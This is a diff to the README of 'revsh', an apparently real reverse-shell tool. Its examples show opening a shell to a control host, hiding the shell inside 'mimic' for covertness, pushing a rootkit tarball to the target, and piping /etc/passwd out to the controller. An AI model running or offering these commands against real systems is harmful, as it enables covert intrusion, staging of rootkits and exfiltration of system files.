emptymonkey/revsh/README.md

 	-rw-r--r-- 1 root root 1538 Jul 18 22:50 /etc/passwd
 	target@kitty:/$

-Note, if you configured the binary at build time to change the IP:PORT address to 192.168.0.42:9999, then the above example becomes even cleaner.
+Note, if you configured the binary at build time to change the IP:PORT address to 192.168.0.42:9999, then the above example becomes even cleaner:

-Local control host:

 	empty@monkey:~$ revsh -c

-Remote target host:

 	target@kitty:~$ ./revsh

 For a covert reverse shell, _revsh_ can be invoked from within [_mimic_](https://github.com/emptymonkey/mimic) on the target host:

+	empty@monkey:~$ revsh -c
-	./mimic -q -e './revsh -s "./mimic -e /bin/bash"'
+	target@kitty:/tmp$ ./mimic -q -e './revsh -s "./mimic -e /bin/bash"'

+For netcat style data transfer (with the crypto benefits of _revsh_) invoke _revsh_ with the -n switch.
+This is useful for moving tools on to the target host:

+	empty@monkey:~$ cat rootkit.tar | ./revsh -c -n
+	target@kitty:/tmp$ ./revsh >./totally_not_a_rootkit.tar

+Or for moving data out from the target host:

+	empty@monkey:~$ revsh -c
+	target@kitty:/tmp$ cat /etc/passwd | ./revsh -n

 ## Installation ##